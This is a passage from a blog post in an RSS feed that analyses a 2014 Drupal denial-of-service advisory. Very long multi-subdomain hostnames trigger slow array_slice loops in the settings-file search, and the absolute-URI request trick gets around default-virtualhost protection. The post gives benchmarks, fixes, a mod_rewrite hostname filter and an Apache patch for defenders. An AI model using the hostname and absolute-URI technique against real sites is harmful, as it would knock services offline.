&lt;li&gt;&lt;code&gt;www/sites/com.modules/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/8080.www.example.com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/www.example.com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/example.com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/com/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;www/sites/default/settings.php&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;Yep, I&#39;m not sure anyone is really using that feature, but that&#39;s what this code does.&lt;/p&gt;

&lt;p&gt;If one file is found before the default one, then it is used, you can alter settings in this file to connect another database, or use another &lt;code&gt;base_url&lt;/code&gt; or &lt;code&gt;database_prefix&lt;/code&gt;, or alter any setting in fact, the multisites feature things.&lt;/p&gt;

&lt;p&gt;As you can see using the &lt;code&gt;sites/sites.php&lt;/code&gt; to set your hostname-to-directory mapping is quite certainly a good thing to do in terms of performances (this search loop is avoided). Remember that theses file checks are done for &lt;strong&gt;every&lt;/strong&gt; HTTP requests received by Drupal.&lt;/p&gt;

&lt;p&gt;Now re-read the patch, before this patch very long hostnames could be used, and you could use a very big number of subdomains... and for each subdomain you add several locations to check for a setting file...&lt;/p&gt;

&lt;p&gt;This is where I came and then I made some evil tests to see how this multisite code would react with bad hostnames. Working only with the allowed characters (alphabetical letters, digits, dots, &lt;code&gt;:&lt;/code&gt;) we can at least play with this deep settings files search. And the &lt;code&gt;sites.php&lt;/code&gt; map shortcuts won&#39;t be used for bad hostnames.&lt;/p&gt;

&lt;h3&gt;And then the DOS issue&lt;/h3&gt;

&lt;p&gt;So, you may think the issue is on the &lt;code&gt;file_exists&lt;/code&gt; calls, as we will run several thousands of file_exists, searching for the first match if we set a hostname with a lot of subdomains. Strangely this is usually quite fast.&lt;/p&gt;

&lt;p&gt;The real issue is on &lt;code&gt;array_slice&lt;/code&gt;, performing several thousands of inverted array_slice is &lt;em&gt;really very very slow&lt;/em&gt;. The first ones are quite fast but the last steps are longer, and we will make several thousands of array_slice operations.&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;test_array_slice&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$server&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot;ARRAY_SLICE array of &amp;quot;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$server&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot; elts =&amp;gt; &amp;quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;nv&quot;&gt;$time_start&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;microtime&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
      &lt;span class=&quot;nb&quot;&gt;array_slice&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$server&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
      &lt;span class=&quot;nv&quot;&gt;$time_end&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;microtime&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
      &lt;span class=&quot;nv&quot;&gt;$time&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$time_end&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$time_start&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot;time for array_slice to &lt;/span&gt;&lt;span class=&quot;si&quot;&gt;$j&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt; : &lt;/span&gt;&lt;span class=&quot;si&quot;&gt;$time&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt; (s)&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&amp;quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;cm&quot;&gt;/*&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -10    : 0.0004069805 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -100   : 0.0004091262 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -500   : 0.0004727840 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -1000  : 0.0005030632 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -4000  : 0.0010337829 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -8000  : 0.0016450881 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -12000 : 0.0018289089 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -14000 : 0.0025160312 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    ARRAY_SLICE array of 16000 elts =&amp;gt; time for array_slice to -16000 : 0.0032360553 (s)&lt;/span&gt;
&lt;span class=&quot;cm&quot;&gt;    */&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;0.003s seems quite fast, but that&#39;s already 7.5 times more than the first array_slices. I made a simple graph to show theses times growth.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/theme/img/posts/graph_array_slice.png&quot; width=&quot;600&quot; height=&quot;463&quot; alt=&quot;array_slice time graph for 16000 elements&quot;/&gt;&lt;/p&gt;

&lt;p&gt;And each of theses times are computed for &lt;strong&gt;1 extraction&lt;/strong&gt; -- like extracting the array of 16 000 elements to index -12 000 --, but the loop is extracting all values. One at each call of the loop.&lt;/p&gt;

&lt;p&gt;The loop is &lt;strong&gt;stacking&lt;/strong&gt; each of theses times, with 16 000 elements the last array_slice is 0.003s but the sum of all theses &lt;code&gt;array_slice&lt;/code&gt; calls is ... &lt;strong&gt;52 seconds!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;My first fix used an &lt;code&gt;array_walk&lt;/code&gt; call to prepare all names that should be checked, instead of rebuilding this name on the loop, this way:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class=&quot;sd&quot;&gt;/**&lt;/span&gt;
&lt;span class=&quot;sd&quot;&gt;     * Apply this function with an array_walk to obtain an array with names that&lt;/span&gt;
&lt;span class=&quot;sd&quot;&gt;     * need to be tested.&lt;/span&gt;
&lt;span class=&quot;sd&quot;&gt;     */&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;prepare_name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;&amp;amp;&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$val&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$key&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;amp;&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$current&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;!==&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$current&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;$val&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$val&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&amp;quot;.&amp;quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$current&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;nv&quot;&gt;$current&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$val&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$rev_server&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;array_reverse&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$server&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$current&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;nb&quot;&gt;array_walk&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$rev_server&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;prepare_name&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$current&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$work_server&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;array_reverse&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$rev_server&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;c1&quot;&gt;// --end new&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$uri&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;--&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;c1&quot;&gt;// now the loop is a simple foreach name on first array&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;foreach&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$work_server&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$k&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;$dir&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$name&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;implode&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;&amp;#39;.&amp;#39;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;array_slice&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$uri&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;));&lt;/span&gt;
      &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And this fixed the performance issue (when &lt;code&gt;file_exists&lt;/code&gt; is fast). But preventing bad hostnames as we have in the final fix is a better fix, more radical, no good reason to manage several thousand of subdomains.&lt;/p&gt;

&lt;p&gt;Is this a real DOS issue? Well, on real life production servers, with a lot of memory and very fast CPUs we&#39;ve made exploits which usually made any (unique) request run in this loop for more than &lt;strong&gt;2 minutes&lt;/strong&gt;. So with an attacker running parallel requests or reaching some cheaper hosts, this could really become a problem.&lt;/p&gt;

&lt;h2&gt;Protect your website&lt;/h2&gt;

&lt;p&gt;Things that &lt;strong&gt;DO NOT&lt;/strong&gt; protect you, &lt;strong&gt;theses things will not protect your Drupal website from being attacked&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Not having a &lt;strong&gt;multisite drupal&lt;/strong&gt;, this happens on the multisite check and you cannot suspend it on D5, D6 and D7 (opt-in for D8, at last), you &lt;strong&gt;always&lt;/strong&gt; have this &lt;code&gt;conf_path()&lt;/code&gt; running, on every request, and you cannot do anything before the settings are loaded.&lt;/li&gt;
&lt;li&gt;Not having drupal on the &lt;strong&gt;Default Virtualhost&lt;/strong&gt;, the &lt;strong&gt;absolute-URI&lt;/strong&gt; trick will hit you, see last part.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Old Drupal&lt;/strong&gt;, this issue is present from a very very long time, also present in Drupal5 for example.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Varnish, Nginx, Apache&lt;/strong&gt; (and maybe others): no default protection.&lt;/li&gt;
&lt;li&gt;Using the &lt;code&gt;www/sites.php&lt;/code&gt; hostname location mapping file, as you will not have the bad hostnames there and you have no way in drupal to reject undefined names.&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;Things &lt;strong&gt;THAT MAY WORK&lt;/strong&gt; to protect yourself (untested):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;using &lt;strong&gt;mod_security&lt;/strong&gt; or some other security tool checking for some strange Host headers, but you should check the behavior of theses tools with the absolute-URI trick (see last part).&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;Things &lt;strong&gt;THAT DO WORK&lt;/strong&gt; to protect yourself (choose one):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Upgrade &lt;a href=&quot;https://www.drupal.org/drupal-6.32-release-notes&quot;&gt;D6&lt;/a&gt; or [D7][DRUPAL_7] to the last versions &lt;em&gt;OR&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Apply the &lt;a href=&quot;https://www.drupal.org/files/issues/sec-D7-conf-path-dos-105258-23.patch&quot;&gt;DOS patch&lt;/a&gt; &lt;em&gt;OR&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;use a default catch-all non-drupal Virtualhost &lt;strong&gt;and&lt;/strong&gt; &lt;a href=&quot;https://issues.apache.org/bugzilla/show_bug.cgi?id=56718&quot;&gt;patch Apache&lt;/a&gt; (see at the end) &lt;em&gt;OR&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;Add a &lt;strong&gt;mod_rewrite&lt;/strong&gt; &lt;em&gt;Hostname check&lt;/em&gt; :&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;The Mod_rewrite Apache module will receive the same &lt;strong&gt;HOSTNAME&lt;/strong&gt; as PHP in the &lt;strong&gt;HTTP_HOST&lt;/strong&gt; variable. If the Absolute-URI trick is used mod_rewrite could detect bad hostname and reject the request. Let&#39;s say you have one or two valid DNS for your Drupal websites (here &lt;code&gt;foo.example.com&lt;/code&gt; and &lt;code&gt;bar.example.com&lt;/code&gt;), then check Apache made the right job and reached your Drupal with theses valid names:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-apache&quot; data-lang=&quot;apache&quot;&gt;&lt;span class=&quot;c&quot;&gt;# Reject with a 403 any hostname wich is not in our list of supported domains&lt;/span&gt;
    &lt;span class=&quot;nb&quot;&gt;RewriteCond&lt;/span&gt; %{HTTP_HOST} !^foo\.example\.com$
    &lt;span class=&quot;nb&quot;&gt;RewriteCond&lt;/span&gt; %{HTTP_HOST} !^bar\.example\.com$
    &lt;span class=&quot;nb&quot;&gt;RewriteRule&lt;/span&gt; .* - [F,L]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h2&gt;The absolute-URI trick?&lt;/h2&gt;

&lt;p&gt;So, as I said before the default Virtualhost method does not protect you, that&#39;s sad because it&#39;s usually a good practice, you add a default Virtualhost with default simple pages (like an &quot;It Works&quot; page) and anyone doing bad things with HOST headers would end there.&lt;/p&gt;

&lt;p&gt;But this can be bypassed with both Apache and Nginx by using the absolute-URI trick describe at the end of the &lt;a href=&quot;http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html&quot;&gt;Practical Host Header attacks paper&lt;/a&gt; that I linked before.&lt;/p&gt;

&lt;p&gt;The trick is to use an absolute URI in the first part of the HTTP query. Instead of the classical HTTP 1.1 request :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /page/foo?z=42 HTTP/1.1
Host: www.example.com
(other headers)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;You do:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET http://www.example.com/page/foo?z=42 HTTP/1.1
Host: something.else
(other headers)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And the RFC 2616 says this request should be managed by the &lt;code&gt;www.example.com&lt;/code&gt; virtualhost, that&#39;s OK. And it also states that the Host Header should then be &lt;strong&gt;ignored&lt;/strong&gt;. Cool. But in both Apache and Nginx this does not means the used Host headers will not be sent to the final application (here PHP).&lt;/p&gt;

&lt;p&gt;At the end Drupal receive the Host header (here &lt;code&gt;something.else&lt;/code&gt;). I think this is an issue on the HTTP server side. This header should be overwritten and should look like &lt;code&gt;www.example.com&lt;/code&gt;. What&#39;s worse is that classical bad characters that are usually detected in the Host headers are not checked in Apache when you use the Abolute-URI trick. On the drupal side we have the regex cleanup on the Host header, that&#39;s a very good thing (&lt;a href=&quot;http://en.wikipedia.org/wiki/Defense_in_depth_%28computing%29&quot;&gt;defense in depth&lt;/a&gt; applied). On the drupal side using the absolute-URI trick will produce a 404 page, the URL does not match any known Drupal path, but this 404 is not a problem for the DOS attack which occurs on the settings file search, very early.&lt;/p&gt;

&lt;p&gt;If you think this is an Apache issue please vote for this &lt;a href=&quot;https://issues.apache.org/bugzilla/show_bug.cgi?id=56718&quot;&gt;Apache patch&lt;/a&gt; on the httpd bugtracker, which overwrite the HTTP_HOST with the absolute-uri host :&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;--- server/protocol.c   2014-03-10 14:04:03.000000000 +0100
+++ server/protocol.c.new   2014-06-05 23:41:38.233573966 +0200
@@ -1063,6 +1063,21 @@

     apr_brigade_destroy(tmp_bb);

+    /*
+    * rfc2616: If Request-URI is an absoluteURI, the host is part of the
+    * Request-URI. Any Host header field value in the request MUST be
+    * ignored.
+    * We are currently ignoring it, but the Host headers are still present
+    * and may get use by naive programs as the one used for vhost choice
+    * or like a valid hostname. So enforce the &#39;ignore&#39; behavior by
+    * overwritting any present Host header.
+    * Note that this is made just before the fixHostname(r) call, so this
+    * Host header entry is still not as safe as the hostname.
+    */
+    if (r-&amp;gt;hostname &amp;amp;&amp;amp; apr_table_get(r-&amp;gt;headers_in, &quot;Host&quot;)) {
+        apr_table_set(r-&amp;gt;headers_in, &quot;Host&quot;, r-&amp;gt;hostname);
+    }
+
     /* update what we think the virtual host is based on the headers we&#39;ve
      * now read. may update status.
      */
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;With this patch applied the only way to get a strange Hostname targeted to your Drupal would be having the Drupal Apache Virtualhost used as default Virtualhost, something usually quite easy to fix.&lt;/p&gt;

&lt;p&gt;Nginx may also need a fix one day.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://twitter.com/regilero&quot;&gt;Stay tuned on twitter, @regilero&lt;/a&gt;, &lt;a href=&quot;https://twitter.com/makinacorpus&quot;&gt;@makinacorpus&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
				<published>2014-09-19 00:00:00 +0200</published>
				<link>http://regilero.github.io/english/security/2014/09/19/drupal-details_ofdrupal_sa_core_2014_003_dos/</link>
			</item>
		
	</channel>
</rss>